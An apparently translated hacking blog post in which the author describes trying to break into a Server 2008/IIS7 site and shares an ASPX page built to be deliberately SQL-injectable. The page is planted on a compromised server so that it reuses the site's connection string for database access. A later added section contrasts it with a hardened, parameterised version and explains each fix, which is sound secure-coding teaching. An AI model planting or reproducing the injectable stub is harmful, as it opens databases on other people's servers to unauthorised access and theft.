Yesterday 4z1 and I were looking at a site. Escalating privileges was really hard; we stared at it for a full 5 hours and got nothing. Server 2008 + IIS7, no sa, no root, none of the usual services...
Along the way we used an aspx constructed-injection page for cross-site access. I found a pile of code online, and not one of them worked.
It isn't much code, so I just wrote my own. Annoying as hell.
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Configuration" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影aspx构造注射专用页面</title>
    <script language="c#" runat="server">
        // Runs at page init. The value of ?xxser=... is concatenated straight into the
        // SQL text, which is exactly what makes this page a deliberately injectable stub.
        void Page_Init(object sender, EventArgs e)
        {
            // "连接名" is a placeholder: the connectionStrings name from the target web.config
            string connStr = ConfigurationManager.ConnectionStrings["连接名"].ConnectionString;

            // using guarantees the connection is closed even if the query throws
            using (SqlConnection conn = new SqlConnection(connStr))
            {
                conn.Open();

                // The parameter comes from the query string, e.g. ?xxser=1
                string i = this.Page.Request.Params["xxser"];

                // "[表]" and "列名" are placeholders for a table and column in that database
                SqlCommand command = new SqlCommand("select * from [表] where 列名= " + i, conn);

                // ExecuteNonQuery returns -1 for a SELECT; the statement is still executed,
                // so any SQL error surfaces in the response
                int x = command.ExecuteNonQuery();
                Response.Write(i + "\n");
                Response.Write(x);
            }
        }
    </script>
</head>
<body>
    <form id="form1" runat="server">
    <div>
    </div>
    </form>
</body>
</html>
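For contrast, here is the same page written the way it should look when a developer actually ships it. This is an added example, not code from the post or from the site 4z1 and I were looking at. It keeps the post's placeholder connection-string name, table and column (连接名, [表], 列名) and assumes the column is an integer. The value from the query string is type-checked, bound as a typed SqlParameter instead of being glued into the SQL text, and provider error messages are not echoed back, which closes both the injection and the error-based probing that the post's stub relies on.

```csharp
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Configuration" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>Parameterized lookup (hardened version, added example)</title>
    <script language="c#" runat="server">
        void Page_Init(object sender, EventArgs e)
        {
            // Step 1: validate the type. The column is assumed to be numeric, so anything
            // that is not an integer is rejected before it gets near the database.
            int id;
            if (!int.TryParse(Request.QueryString["xxser"], out id))
            {
                Response.StatusCode = 400;
                Response.Write("bad request");
                Response.End();
                return;
            }

            // "连接名" is the same placeholder connection-string name as in the post
            string connStr = ConfigurationManager.ConnectionStrings["连接名"].ConnectionString;

            using (SqlConnection conn = new SqlConnection(connStr))
            using (SqlCommand cmd = new SqlCommand("select count(*) from [表] where 列名 = @id", conn))
            {
                // Step 2: bind the value as a typed parameter. The SQL text is fixed and
                // the value travels separately, so no input can change the statement.
                cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;

                try
                {
                    conn.Open();
                    // ExecuteScalar returns the single COUNT(*) value (ExecuteNonQuery would give -1)
                    int rows = (int)cmd.ExecuteScalar();
                    Response.Write(rows);
                }
                catch (SqlException)
                {
                    // Step 3: never echo provider error text to the client; a generic message
                    // removes the error channel. Log the exception server-side instead
                    // (logging call omitted here).
                    Response.StatusCode = 500;
                    Response.Write("database error");
                }
            }
        }
    </script>
</head>
<body>
    <form id="form1" runat="server"><div></div></form>
</body>
</html>
```

The three changes are independent: the int.TryParse check alone blocks non-numeric payloads, the SqlParameter alone makes the statement immune to injection regardless of input, and the catch block alone stops error messages from leaking schema details. Together they are the minimum a reviewer should expect before a page like this is allowed on a production server.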